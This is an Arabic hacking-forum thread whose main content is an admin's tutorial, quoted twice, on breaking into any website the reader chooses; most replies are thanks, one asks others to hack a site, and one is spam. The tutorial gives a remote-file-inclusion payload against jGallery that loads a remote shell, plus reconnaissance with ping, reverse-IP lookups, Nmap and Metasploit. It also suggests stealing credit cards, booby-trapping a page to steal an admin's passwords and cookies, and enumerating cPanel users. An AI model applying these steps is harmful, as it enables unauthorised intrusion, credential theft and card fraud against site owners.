مرحبا بك في منتدى والهكر والاختراق

hacker-noir + mafia-blanche = youssef oubella
 
الرئيسيةس .و .جبحـثالتسجيلالأعضاءالمجموعاتدخول

شاطر | 
 

 تعال اخترق الموقع اللى على مزاجك

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
انتقل الى الصفحة : الصفحة السابقة  1, 2
كاتب الموضوعرسالة
D3ThaR

avatar

عدد الرسائل : 12
تاريخ التسجيل : 21/06/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الأحد يونيو 27, 2010 3:06 am

الف شكر!!

لاكن متى يمكن ان ارى الــ[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل] !!!!!!!!!!!!
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
D3ThaR

avatar

عدد الرسائل : 12
تاريخ التسجيل : 21/06/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الأحد يونيو 27, 2010 3:07 am

انا مقراتش كل الموضوع... لاكن قريت اولو ... افادني اكثير موقغ Milw0rm

شكرا لك
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
D3ThaR

avatar

عدد الرسائل : 12
تاريخ التسجيل : 21/06/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الأحد يونيو 27, 2010 3:07 am

انا مقراتش كل الموضوع... لاكن قريت اولو ... افادني اكثير موقغ Milw0rm

شكرا لك
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
D3ThaR

avatar

عدد الرسائل : 12
تاريخ التسجيل : 21/06/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الأحد يونيو 27, 2010 3:08 am

انا مقراتش كل الموضوع... لاكن قريت اولو ... افادني اكثير موقغ Milw0rm

شكرا لك
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
D3ThaR

avatar

عدد الرسائل : 12
تاريخ التسجيل : 21/06/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الأحد يونيو 27, 2010 3:08 am

انا مقراتش كل الموضوع... لاكن قريت اولو ... افادني اكثير موقغ Milw0rm

شكرا لك
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
D3ThaR

avatar

عدد الرسائل : 12
تاريخ التسجيل : 21/06/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الأحد يونيو 27, 2010 3:08 am

انا مقراتش كل الموضوع... لاكن قريت اولو ... افادني اكثير موقغ Milw0rm

شكرا لك
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
D3ThaR

avatar

عدد الرسائل : 12
تاريخ التسجيل : 21/06/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الأحد يونيو 27, 2010 3:08 am

انا مقراتش كل الموضوع... لاكن قريت اولو ... افادني اكثير موقغ Milw0rm

شكرا لك
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
D3ThaR

avatar

عدد الرسائل : 12
تاريخ التسجيل : 21/06/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الأحد يونيو 27, 2010 3:08 am

انا مقراتش كل الموضوع... لاكن قريت اولو ... افادني اكثير موقغ Milw0rm

شكرا لك
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
D3ThaR

avatar

عدد الرسائل : 12
تاريخ التسجيل : 21/06/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الأحد يونيو 27, 2010 3:09 am

انا مقراتش كل الموضوع... لاكن قريت اولو ... افادني اكثير موقغ Milw0rm

شكرا لك
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
D3ThaR

avatar

عدد الرسائل : 12
تاريخ التسجيل : 21/06/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الجمعة يوليو 02, 2010 5:01 am

بس في واحد محترف في الهاكر قال لي انوا هاي الطريقة قديمه ...

ممكن اتعلمنا الطريقة الاجديدأ

ولله لدعيلك ربي ابنوا انجحك!
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
7aMZaWy

avatar

عدد الرسائل : 1
تاريخ التسجيل : 15/07/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الخميس يوليو 15, 2010 8:17 am

مشكووور وأتمنى أن تكون الطريقه سليمــه
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
yacinejtn

avatar

عدد الرسائل : 1
تاريخ التسجيل : 17/07/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   السبت يوليو 17, 2010 5:39 am

thankssssssss
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
mahir

avatar

عدد الرسائل : 4
تاريخ التسجيل : 17/07/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   السبت يوليو 17, 2010 11:42 pm

مشكوووووووووووووور
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
نووف

avatar

عدد الرسائل : 1
تاريخ التسجيل : 05/08/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الخميس أغسطس 05, 2010 5:14 am

مشكوووور وجاري التجربه ^_^
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
bilal84

avatar

عدد الرسائل : 1
تاريخ التسجيل : 08/08/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الأحد أغسطس 08, 2010 11:10 am

Admin كتب:
شرحى اليوم عن طريقة اختراق المواقع بالذات الموقع اللى حضرتك تنقية تابع معى و اوعا تغمض عينيك
و الشرح موجود ايضا فى ملف rar
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل]
باسورد فك الضغط
ThE dE@Th
بسم الله الرحمن الرحيم

كاتب الموضوع
ThE dE@Th

لا يتحمل اى مسئولية نتيجة استخدام هذا الشرح حيث انه مقدم للتوعية بمخاطر الهكرز و اساليبهم و يحذر نقل او نسخ هذا الشرح بدون اذن من الكاتب
الدرس:- كيف تحدد هدفك (موقع) حتى تخترقه
نبدأ على بركة الله
اولا اختار الموقع المطلوب اختراقه مثلا [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل]
نشيل كلمة اسم الموقع ونحط اسم الموقع المراد اختراقه طيب دلوقتى حددنا هدفنا شوف معايا هنجيب ثغره ازاىاول حاجه نطلع اى بى الموقع طيب نطلعه ازاى بص معايا فى الصوره كده طيب الامر هكذا:-
نفتح الدوس و نكتب Ping [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل]
نشيل اسم الموقع و نحط اسم الموقع المراد اختراقه

طيب نركن الابى و ندور جوه الموقع على حاجه زى كده
Powered by xxx
الاكسات دى اسم الاسكربت طيب ناخد الاسم و نطير على الميل ورم او السيكيورتى فوكس و نبحث عن ثغره له
فلنفرض ان اسم الاسكربت
jGallery
نطير على الميلورم
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل]





This image has been resized. Click this bar to view the full image. The original image is sized 800x570 and weights 100KB.

طيب بعد من دوس هيطلعلنا الثغره كده





This image has been resized. Click this bar to view the full image. The original image is sized 781x388 and weights 39KB.
الاستغلال كالاتى
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل] اللى فيه الاسكربت المصاب/الموقع المراد اختراقه/index.php?index.php?G_JGALL[inc_path]=http://.txt
شل على هيئة txt
طيب نفرض اننا ملقناش الاسكربت مصاب صاحب الموقع مرقع كل الثغرات نلم العده و نقوم لسه بدرى على كده
نجيب الاى بى و نروح على
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل]
و نكتب زى اللى فى الصوره علشان نبحث عن جميع المواقع اللى على السيرفر و فيها كلمة
Powered by
ملحوظه :-*مش كل المواقع اللى بتطلع بتبقى على نفس السيرفر احيانا*





This image has been resized. Click this bar to view the full image. The original image is sized 800x436 and weights 41KB.
طيب ظهر لنا مواقع كتيره على السيرفر و فيها اسكربتات واضحه نروح للميل ورم و انشاء الله نلاقى لها ثغرات طيب لو ملقناش تابع
طيب احنا ملقناش اسم الاسكربت زى ما انت قولت
نشوف ملف مميز فى روابط الموقع او المواقع اللى على السيرفر و نعمل بحث عنه فى جوجل هتلاقى مواقع كاتبه اسم الاسكربت
جبت اسم الاسكربت و ملقتلوش ثغرات نادرا او معرفتش اجيبه او مقفوله ثغراته مفيش الا حل واحد هوه ان انتا تدور يدوى على الثغرات
هتقولى ازاى هقولك دور على ثغرة اسكل او اكس اس اس و شرح هذه الثغرات هنا فى الموقع
طيب برضه مفيش فايده مش لاقى خالص
نجرى على طول على موقع الاستضافه و نشوف مركب اسكربت ايه
يا عم براحه اجيبه منين الاستضافه ده نروح للموقع التالى ذكره
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل]





This image has been resized. Click this bar to view the full image. The original image is sized 781x388 and weights 66KB.

هيطلع لنا كده





This image has been resized. Click this bar to view the full image. The original image is sized 781x388 and weights 93KB.
كله واضح الحمد لله
طيب ملقناش برضه اى حاجه تقدر تساعدنا لاختراق الموقع المراد طيب ندخل تانى على النت كرافت و شوف معايا





This image has been resized. Click this bar to view the full image. The original image is sized 781x388 and weights 38KB.
نجيب الثغرات من هذا الرابط
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل]
شيل ال**** و ضع مكانها m e t a بدون مسافة
ملحوظه يجب انت تكون لديك خبره بالميتاسبلوت للتعامل مع هذا الموقع لان جميع ثغراته ميتا
طيب لاقينا صاحب السيرفر ميه ميه مفيش و لا ثغره عنده فى السيرفر
يالا بينا نشوف طريقه نجيب اى فاحص منافذ و ليكن
Nmap
للتحميل
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل]
Start ----> Run ----> CMD -----> NMAP
وذلك لأنظمة تشغيل الويندوز
بمجرد إدخال IP أو Domain Name فإن NMAP يحدد الهدف المطلوب فحصه و ل NMAP القدرة علي فحص أي مدي من الأيبيهات في نفس الوقت ولكن ذلك سيأخذ وقت كبير جدا لإظهار النتائج ويجب أن يلاحظ أن في عملية الفحص عموما ليس من الضروري والمنطقي القيام بفحص جميع البورتات لإنها عملية ستأخذ وقت كبير جدا
عملية السكان و أوامر البرنامج في الحالات المختلفة وهي أوامر ليس لها علاقة بفحص البورتات أو نظام التشغيل
الامر sL
هو عبارة عن List Scan وبإستخدام فإن NMAP سيقوم بفحص الأي بي المحدد ولكن دون إرسال مجسات حقيقية و لكن النتائج في معظم الحالات إن لم تكن كلها تكون سلبية وهذا الأمر لا يمكن إستخدامه مع أوامر فحص البورتات و إكتشاف أنظمة التشغيل
الامر sP
هو عبارة عن Ping Scan الأمر مفيد إلي حد ما في عملية إسكتشاف الأجهزة العاملة في مدي أي بي معين أو المتصلة بسيرفر أو شبكة معينة
بإستخدام هذا الأمر فإن البرنامج يرسل رسالة ICMP وهي تعني Internet Control Message Protocol حيث يتم التأكد من مدي إستجابة الجهاز من عدمه وعموما ودون الدخول في التفاصيل الخاصة بهذه الرسالة فإن هذه الأداة تستخدم في إستكشاف الأخطاء الموجودة بالشبكة ومدي تقبل إتصال خدمة معينة وهذه الرسالة تطلب إتصال TCP إلي البورت 80 وهو البورت المخصص لبروتوكول ال Http . و عملية ال Ping في حد ذاتها عملية مهمة جدا بالنسبة للشبكات ولكن إستخدامها بمفردها لن يؤدي لأي نتائج لأن أي فايروول سيرفض العملية من أساسها ولكن الأفضل هو إستخدام أمر Ping مع أوامر أخري أكثر تعقيدا وسيتم شرح ذلك

الأمر P0
وهو يعني No Ping حيث لا يتم إستكشاف الأجهزة قبل البدء في عملية الفحص وهو أمر ضروري في حالات فحص البورتات و حالات فحص نوع نظام التشغيل مع ملاحظة أن و بإستخدام هذا الأمر فإن NMAP سيقوم بعملية الفحص بلا أي إسكتشاف ومعظم عمليات الفحص لا تتم بدون هذا الأمر

الأمر Ps
وهو يعني TCP SYN Ping وفيه يتم إرسال رسائل TCP فارغة في زمن محدد و ال TCP هو أحد بروتوكولات الإتصال ونقل البيانات بين الأجهزة داخل الشبكة أو عن طريق الإنترنت Transmission Control Protocol
وذلك إلي بورت أو أكثر حيث يتم تحديد رقم البورتات بجانب الأمر و إذا تم تركه فارغا فسيتم إستخدام البورت 80 . هذه الرسلة التي سيتم إرسالها ستطلب الإتصال و بالطبع فالجهاز الآخر سيرفض الإتصال برسالة RST أو reset وذلك في حالة إذا كان البورت مغلق و هو غالبا ما يحدث ولكن في حالة وجود البورت مفتوح فإن الرد سيكون بقبول الإتصال برسالة تسمي SYN/ACK TCP و في النهاية فإن جهازك سيقوم بإرسال رسالة RST reset ولكن الهدف هنا هو إكتشاف ودراسة رد الفعل من الجهازالآخر وليس إجراء إتصال فقبول الإتصال معناه وجود خطأ يجب إصلاحه أو إستغلاله حسب الحاجة

الأمر PA
وهو يعني TCP ACK Ping ولاحظ الإختلاف بين هذا الأمر وا لأمر الذي قبله حيث في هذا الأمر يستبدل syn بACK وذلك لتعريف رسالة الإتصال من البداية
ولاحظ أن إستخدام SYN أو ACK يزيد من فرصة التغلب علي الفايروول الخاص بالراوتر حيث يتم رفض الإتصالات بمجرد إرسال الرسائل الفارغة و كل فايروول له طريقته في التعامل مع مثل هذه الإتصالالت وهو ما سوف يتم شرحه في موضوع آخر

الأمر PU

يعني udp ping أي User Datagram Protocol و هو نوع آخر من أنواع الإتصال ونقل البيانات بين الأجهزة ولكن يتميز عن ال TCP بالسرعة حيث يتم إرسال رسائل قصيرة وسريعة في فترة وجيزة للغاية وبالطبع يتم تحديد البورت المراد إستخدامه بعد كتابة الأمر مباشرة ويمكن الإختيار من بين 65,535 بورت و بمجرد أن يتم إرسال من هذا النوع إلي الجهاز الآخر وعند وجود البورت مغلق فإنه يتم الرد برسال ICMP وبالتالي فإنه يتم إكتشاف أن الجهاز يعمل ومن الممكن إجراء سكان قوي عليه

وهذه الأوامر هي معظم الأوامر التي تستخدم في عملية الإستكشاف لأي أي بي أو شبكة
ومرة اخري فإن التدريب علي برنامج سيعلمك الكثير في أمور إستكشاف الشبكات و الأجهزة و إكتشاف الأخطاء
وبعد ذلك سيتم إستكمال الأوامر الخاصة بإكتشاف البورتات و نظام التشغيل وكذلك البرامج والخدمات التي يمكنها الإتصال وذلك بالجهاز أو الشبكة الذي يجري عليه الفحص

طيب هتقولى اعمل ايه يعنى بيه لو لاقيت بورتات مفتوحه و ده اكيد عندك حاجه من الاتنين يا أما تحاول تدخل عليها بالطريقه دى
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل]
نشيل بورت و نحط رقم البورت و نشيل اسم الموقع و نحط اسم الموقع المراد
طيب ممكن ندخل من على الدوس و نعرف مثلا نوع الاف تى بى و ممكن نلاقيله ثغرات او عن طريق التلنت
طيب مفيش حاجه من اللى انت بتقولها دى نفعه اعمل ايه؟
تعالى اتعلم بعض الحيل
اول حيله انك تروح لشركة الاستضافه اللى عليها الموقع و تقول لهم انك عايز تجرب الخدمه قبل ما تشترك عندهم هيدولك باس و يوزر اف تى بى و عيش و مش فعالة قوى
ثانيا ممكن تسرق فيزا و تشترك فى السيرفر و نفس الكلام اللى فوق
ملحوظه سرقة الفيزات حرام شرعا و مرفوضه
ثالثا ممكن لو معاك ملير تلغم صفحه و تبعتها الادمن يعنى و تخترق جهازه و تطلع الباسوردات اللى على جهازه او تاخد الكوكيز ده لو انت ملقتش ثغرة اكس اس اس او تأخد اميله و ممكن تلاقى فيه الباس
رابعا تجرب باس الايميل فى السى بانل طيب هتقولى انا معيش اليوزر تعالى اوريك تطلع اليوزر ازاى
ندخل على الموقع المستهدف و بعد الرابط نكتب
cgi-sys/scgiwarp






This image has been resized. Click this bar to view the full image. The original image is sized 804x569 and weights 29KB.
الى هنا ينتهى الشرح تم بحمد الله
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
جيتك بشو
زائر
avatar


مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الخميس أغسطس 12, 2010 4:20 pm

مشششششششششكورررر
الرجوع الى أعلى الصفحة اذهب الى الأسفل
علمني الهكر وعطيك منتدىvb

avatar

عدد الرسائل : 2
تاريخ التسجيل : 16/08/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الإثنين أغسطس 16, 2010 7:57 am

شكرا اخي العزيز admin
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
helase

avatar

عدد الرسائل : 1
تاريخ التسجيل : 11/09/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   السبت سبتمبر 11, 2010 4:24 pm

tthankssssssssssssss
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
mais-n

avatar

عدد الرسائل : 1
تاريخ التسجيل : 13/09/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الإثنين سبتمبر 13, 2010 8:48 pm

thank youuuuuuuuuuuuuuuuuu
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
simirri

avatar

عدد الرسائل : 1
تاريخ التسجيل : 14/09/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الثلاثاء سبتمبر 14, 2010 10:45 am

مشكووووور شرح كتير رائع
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
sad soul

avatar

عدد الرسائل : 1
تاريخ التسجيل : 25/09/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   السبت سبتمبر 25, 2010 6:26 am

مشكوووووووووووووووووووووووووووووووووووووووووور
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
hackernoir

avatar

عدد الرسائل : 2
تاريخ التسجيل : 25/09/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الأحد سبتمبر 26, 2010 12:08 pm

[i]mircccciiiiiiiiiiiiiiiii
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
sid_ahmed.bouiri

avatar

عدد الرسائل : 1
تاريخ التسجيل : 02/10/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   السبت أكتوبر 02, 2010 7:49 am

si tu veux voir la vedeo de hellata à poils . entre dans ce site ok ?
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
Abdullah_AlGhamdI

avatar

عدد الرسائل : 1
تاريخ التسجيل : 14/10/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الخميس أكتوبر 14, 2010 7:43 am

يعطيك العافيه
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
bensslima

avatar

عدد الرسائل : 1
تاريخ التسجيل : 18/10/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الإثنين أكتوبر 18, 2010 10:10 am

مشكووووور شرح كتير رائع
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
روان
زائر
avatar


مُساهمةموضوع: بتمنى تلبو طلبي   الخميس أكتوبر 28, 2010 7:04 am

مسا الخير


بس بليز عندي طلب ازا بتقدرو انو تخترقو هذا الموقع وتهكرووه


بليييييز

هذا الموقع
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكراوى

avatar

عدد الرسائل : 6
تاريخ التسجيل : 26/11/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الجمعة نوفمبر 26, 2010 7:43 am

مشكووووووووووووووووووووووووووووووووووووووووووووووووووووور


الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
zezo155

avatar

عدد الرسائل : 1
تاريخ التسجيل : 28/11/2010

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الأحد نوفمبر 28, 2010 1:20 am

مشكووووووور
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
monkey2010

avatar

عدد الرسائل : 1
تاريخ التسجيل : 02/02/2011

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الأربعاء فبراير 02, 2011 5:23 am

thanxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
زاهي زهوان

avatar

عدد الرسائل : 3
تاريخ التسجيل : 17/02/2011

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الخميس فبراير 17, 2011 5:33 am

شكرا كتيررررررررررررررررررررررررررررررررررررر
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
زاهي زهوان

avatar

عدد الرسائل : 3
تاريخ التسجيل : 17/02/2011

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الخميس فبراير 17, 2011 5:43 am

مشكورين ياخويا على الشرح
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
charmeur

avatar

عدد الرسائل : 2
تاريخ التسجيل : 20/02/2011

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الأحد فبراير 20, 2011 1:54 pm

شكراااااااااااااااااااااااااااااا
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
mozy2010

avatar

عدد الرسائل : 1
تاريخ التسجيل : 23/02/2011

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الأربعاء فبراير 23, 2011 3:53 am

مشكووووووووووور ومنتظريم كل ما هو جديد
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
mzizou02

avatar

عدد الرسائل : 1
تاريخ التسجيل : 02/03/2011

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الأربعاء مارس 02, 2011 2:56 am

merci infiniment kho
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
osse2302

avatar

عدد الرسائل : 2
تاريخ التسجيل : 11/03/2011

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الجمعة مارس 11, 2011 4:20 pm

merciiiiiiiiiiii
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
osse2302

avatar

عدد الرسائل : 2
تاريخ التسجيل : 11/03/2011

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الجمعة مارس 11, 2011 4:21 pm

merciiiiiiiiiiii
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
NewGhost

avatar

عدد الرسائل : 1
تاريخ التسجيل : 20/03/2011

مُساهمةموضوع: شكرا   الأحد مارس 20, 2011 4:01 pm

مشكور على الموضوع الجميل
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
الغاضب المقنع

avatar

عدد الرسائل : 1
تاريخ التسجيل : 22/03/2011

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الثلاثاء مارس 22, 2011 4:44 am

مشكوور اخي
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
hell

avatar

عدد الرسائل : 1
تاريخ التسجيل : 31/03/2011

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   الخميس مارس 31, 2011 6:36 pm

مشكوووووووووووووووووووووووووووووور
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
farroussa97

avatar

عدد الرسائل : 1
تاريخ التسجيل : 02/04/2011

مُساهمةموضوع: رد: تعال اخترق الموقع اللى على مزاجك   السبت أبريل 02, 2011 9:30 am

merciiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
زاهي زهوان

avatar

عدد الرسائل : 3
تاريخ التسجيل : 17/02/2011

مُساهمةموضوع: هاي   الأحد أبريل 03, 2011 12:57 am

لايمكنني رؤية الوصلات علما انني قمت بالتسجيل كما هو مطلوب ؟؟؟؟؟؟؟؟؟؟؟؟؟ ما الحل؟
Admin كتب:
شرحى اليوم عن طريقة اختراق المواقع بالذات الموقع اللى حضرتك تنقية تابع معى و اوعا تغمض عينيك
و الشرح موجود ايضا فى ملف rar
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل]
باسورد فك الضغط
ThE dE@Th
بسم الله الرحمن الرحيم

كاتب الموضوع
ThE dE@Th

لا يتحمل اى مسئولية نتيجة استخدام هذا الشرح حيث انه مقدم للتوعية بمخاطر الهكرز و اساليبهم و يحذر نقل او نسخ هذا الشرح بدون اذن من الكاتب
الدرس:- كيف تحدد هدفك (موقع) حتى تخترقه
نبدأ على بركة الله
اولا اختار الموقع المطلوب اختراقه مثلا [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل]
نشيل كلمة اسم الموقع ونحط اسم الموقع المراد اختراقه طيب دلوقتى حددنا هدفنا شوف معايا هنجيب ثغره ازاىاول حاجه نطلع اى بى الموقع طيب نطلعه ازاى بص معايا فى الصوره كده طيب الامر هكذا:-
نفتح الدوس و نكتب Ping [فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل]
نشيل اسم الموقع و نحط اسم الموقع المراد اختراقه

طيب نركن الابى و ندور جوه الموقع على حاجه زى كده
Powered by xxx
الاكسات دى اسم الاسكربت طيب ناخد الاسم و نطير على الميل ورم او السيكيورتى فوكس و نبحث عن ثغره له
فلنفرض ان اسم الاسكربت
jGallery
نطير على الميلورم
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل]





This image has been resized. Click this bar to view the full image. The original image is sized 800x570 and weights 100KB.

طيب بعد من دوس هيطلعلنا الثغره كده





This image has been resized. Click this bar to view the full image. The original image is sized 781x388 and weights 39KB.
الاستغلال كالاتى
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل] اللى فيه الاسكربت المصاب/الموقع المراد اختراقه/index.php?index.php?G_JGALL[inc_path]=http://.txt
شل على هيئة txt
طيب نفرض اننا ملقناش الاسكربت مصاب صاحب الموقع مرقع كل الثغرات نلم العده و نقوم لسه بدرى على كده
نجيب الاى بى و نروح على
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل]
و نكتب زى اللى فى الصوره علشان نبحث عن جميع المواقع اللى على السيرفر و فيها كلمة
Powered by
ملحوظه :-*مش كل المواقع اللى بتطلع بتبقى على نفس السيرفر احيانا*





This image has been resized. Click this bar to view the full image. The original image is sized 800x436 and weights 41KB.
طيب ظهر لنا مواقع كتيره على السيرفر و فيها اسكربتات واضحه نروح للميل ورم و انشاء الله نلاقى لها ثغرات طيب لو ملقناش تابع
طيب احنا ملقناش اسم الاسكربت زى ما انت قولت
نشوف ملف مميز فى روابط الموقع او المواقع اللى على السيرفر و نعمل بحث عنه فى جوجل هتلاقى مواقع كاتبه اسم الاسكربت
جبت اسم الاسكربت و ملقتلوش ثغرات نادرا او معرفتش اجيبه او مقفوله ثغراته مفيش الا حل واحد هوه ان انتا تدور يدوى على الثغرات
هتقولى ازاى هقولك دور على ثغرة اسكل او اكس اس اس و شرح هذه الثغرات هنا فى الموقع
طيب برضه مفيش فايده مش لاقى خالص
نجرى على طول على موقع الاستضافه و نشوف مركب اسكربت ايه
يا عم براحه اجيبه منين الاستضافه ده نروح للموقع التالى ذكره
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل]





This image has been resized. Click this bar to view the full image. The original image is sized 781x388 and weights 66KB.

هيطلع لنا كده





This image has been resized. Click this bar to view the full image. The original image is sized 781x388 and weights 93KB.
كله واضح الحمد لله
طيب ملقناش برضه اى حاجه تقدر تساعدنا لاختراق الموقع المراد طيب ندخل تانى على النت كرافت و شوف معايا





This image has been resized. Click this bar to view the full image. The original image is sized 781x388 and weights 38KB.
نجيب الثغرات من هذا الرابط
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات .
إضغط هنا للتسجيل]
شيل ال**** و ضع مكانها m e t a بدون مسافة
ملحوظه يجب انت تكون لديك خبره بالميتاسبلوت للتعامل مع هذا الموقع لان جميع ثغراته ميتا
طيب لاقينا صاحب السيرفر ميه ميه مفيش و لا ثغره عنده فى السيرفر
يالا بينا نشوف طريقه نجيب اى فاحص منافذ و ليكن
Nmap
للتحميل
